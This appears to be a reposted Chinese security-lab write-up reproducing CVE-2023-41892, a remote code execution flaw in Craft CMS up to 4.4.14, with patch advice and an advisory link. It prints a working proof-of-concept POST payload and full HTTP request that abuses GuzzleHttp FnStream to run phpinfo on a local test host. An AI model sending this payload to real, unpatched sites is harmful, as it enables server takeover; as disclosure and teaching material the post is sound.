网安引领时代,弥天点亮未来
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
Pixel&tonic Craft CMS是美国Pixel&tonic公司的一套内容管理系统(CMS)。
Pixel&tonic Craft CMS 4.4.15之前版本存在代码注入漏洞,该漏洞源于存在远程代码执行漏洞。
Craft CMS 是一个用于创建数字体验的平台。这是一种高影响力、低复杂性的攻击媒介。建议运行 4.4.15 之前的 Craft 安装的用户至少更新到该版本以缓解该问题。此问题已在 Craft CMS 4.4.15 中修复。
4.0.0-RC1 <= Craft CMS <= 4.4.14
1.访问漏洞环境
2.对漏洞进行复现
POC (POST)
action=conditions/render&test[userCondition]=craftelementsconditionsusersUserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\GuzzleHttp\Psr7\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
漏洞复现
POST请求, phpinfo注入命令
POST /index.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
Connection: close
Content-Length: 238
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
action=conditions/render&test[userCondition]=craftelementsconditionsusersUserCondition&config={"name":"test[userCondition]","as xyz":{"class":"\GuzzleHttp\Psr7\FnStream", "__construct()": [{"close":null}],"_fn_close":"phpinfo"}}
执行phpinfo成功
3.nuclei测试(漏洞存在)
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
Craft CMS 4.4.15 中修复,建议受影响用户升级。
https://github.com/craftcms/cms/security/advisories/GHSA-4w8r-3xrw-v25g
原文始发于微信公众号(弥天安全实验室):Craft CMS 远程代码执行漏洞(CVE-2023-41892)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论